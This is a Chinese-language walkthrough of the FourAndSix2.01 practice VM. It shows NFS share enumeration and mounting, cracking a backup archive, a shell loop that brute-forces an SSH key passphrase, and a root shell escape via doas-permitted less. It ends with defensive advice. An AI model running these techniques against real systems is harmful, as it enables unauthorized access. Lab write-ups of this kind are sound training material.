FourAndSix2.01靶机渗透
字数 1011 2025-08-18 11:37:53
FourAndSix2.01 靶机渗透教学文档
1. 靶机概述
FourAndSix2.01 是一个用于渗透测试练习的虚拟机靶机,目标是通过各种技术手段获取 root 权限并读取 /root/flag.txt 文件。
2. 环境准备
- 将靶机导入 VirtualBox
- 启动后查看靶机 IP 地址(示例中为 192.168.0.104)
3. 信息收集
3.1 端口扫描
使用 nmap 进行全面扫描:
nmap -n -v -Pn -p- -A 192.168.0.104
扫描结果:
- 22/tcp: OpenSSH 7.9
- 111/tcp: rpcbind 2 (RPC #100000)
- 809/tcp: mountd 1-3 (RPC #100005)
- 2049/tcp: nfs 2-3 (RPC #100003)
3.2 NFS 服务探测
NFS (Network File System) 是一种分布式文件系统协议,允许不同系统间共享文件。
使用 nmap 脚本探测可挂载目录:
nmap -sV --script=nfs-showmount 192.168.0.104
发现可挂载目录:
/home/user/storage
4. 漏洞利用
4.1 挂载 NFS 共享目录
sudo nfspysh -o server=192.168.0.104:/home/user/storage /tmp/test/
挂载后发现 backup.7z 压缩文件。
4.2 获取并破解压缩包
将文件复制到本地:
get backup.7z /tmp/qsNw8ttnhlyM.7z
使用 John the Ripper 破解密码:
- 密码为:
chocolate
解压后得到 id_rsa 私钥文件。
4.3 SSH 私钥利用
私钥内容:
-----BEGIN OPENSSH PRIVATE KEY-----
[...]
-----END OPENSSH PRIVATE KEY-----
使用脚本爆破私钥密码:
cat /home/threst/Pentest/字典/password.txt | while read pass; do
if ssh-keygen -c -C "user@192.168.0.105" -P $pass -f id_rsa &>/dev/null; then
echo $pass; break;
fi;
done
获得私钥密码:12345678
4.4 SSH 登录
使用私钥登录:
ssh -i id_rsa user@192.168.0.105
5. 权限提升
5.1 检查 doas 配置
查看 /etc/doas.conf 文件:
permit :wheel
5.2 利用 doas 提权
使用 doas 查看日志文件:
doas /usr/bin/less /var/log/authlog
在 less 中执行:
- 输入
v进入编辑模式 - 输入
:!/bin/sh获取 root shell
6. 获取 flag
查看 flag 文件:
cat /root/flag.txt
flag 内容:
acd043bc3103ed3dd02eee99d5b0ff42
7. 技术要点总结
- NFS 服务利用:通过 NFS 共享获取敏感文件
- 压缩包破解:使用 John the Ripper 破解密码
- SSH 私钥利用:爆破私钥密码后实现认证绕过
- doas 提权:利用日志查看器的编辑功能执行命令
- 权限提升:从普通用户到 root 权限的完整路径
8. 防御建议
- 限制 NFS 共享目录的访问权限
- 对敏感文件使用强密码加密
- 禁用或限制 SSH 密钥认证
- 谨慎配置 doas/sudo 权限
- 定期更新系统和应用软件